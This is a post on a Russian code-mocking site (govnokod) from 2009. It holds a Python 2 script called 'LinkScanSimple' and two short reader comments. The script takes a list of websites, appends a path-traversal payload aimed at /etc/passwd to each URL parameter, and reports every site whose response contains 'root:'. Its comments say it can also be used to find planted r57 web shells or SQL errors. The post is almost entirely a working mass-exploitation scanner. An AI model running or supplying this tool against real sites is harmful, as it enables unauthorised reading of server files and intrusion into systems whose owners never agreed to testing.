1. Python / Говнокод #449

    −424

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    #!/usr/bin/python
#LinkScanSimple will take a list of sites and
#add an extension after the = then search the 
#source for a match you choose. 

#For an LFI scan I use "root:" but for a shell location
#I would choose the shell title (r57shell). For SQL
#you can choose a common sql error.

import sys, re, urllib2, sets, socket
socket.setdefaulttimeout(5)

#---------------------------------------------------------
#Edit what you want added to the address.
EXT = "../../../../../../../../../../../../etc/passwd" 

#Edit what you want to search for.
MATCH = "root:"
#---------------------------------------------------------

def parse_urls(links):
	urls = []
	for link in links: 
		num = link.count("=")
		if num > 0:
			for x in xrange(num):
				link = link.rsplit("=",x+1)[0]+"="
				urls.append(link+EXT)
	urls = list(sets.Set(urls))
	return urls
 
def test(host): 
 	print "[+] Testing:",host.replace(EXT,"")
	try: 
		source = urllib2.urlopen(host).read() 
		if re.search(MATCH, source): 
			print "[+] Found:",host
		else: 
			print "[-] Not Vuln." 
	except:
		pass 
 

print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSimple v1.0"
print "\t-------------------------------------------------\n"
			
if len(sys.argv) != 2:
	print "Usage : ./linkscan.py <site_list>"
	print "Ex: ./linkscan.py sites.txt\n"
	sys.exit(1)
	
try:
	sites = open(sys.argv[1], "r").readlines()
except(IOError): 
  	print "Error: Check your site list path\n"
  	sys.exit(1)

print "[+] Loaded:",len(sites),"sites"
urls = parse_urls(sites)
print "[+] Links Found:",len(urls)
for url in urls: 
	try:
		test(url.replace("\n",""))
	except(KeyboardInterrupt):
		pass
print "\n[-] Scan Complete\n"

    Запостил: guest, 23 Января 2009

    Комментарии (2) RSS

    • ava guest 24.01.2009 20:20 # 0

      Hovnyuk:
      О ужас! Что сие делает? Может кто объяснит?
      Ответить

    • ava guest 09.02.2009 12:56 # +1

      Мимо проходил:
      Ну насколько я понял тестирует сайты из списка на возможность уязвимость
      Ответить

    Добавить комментарий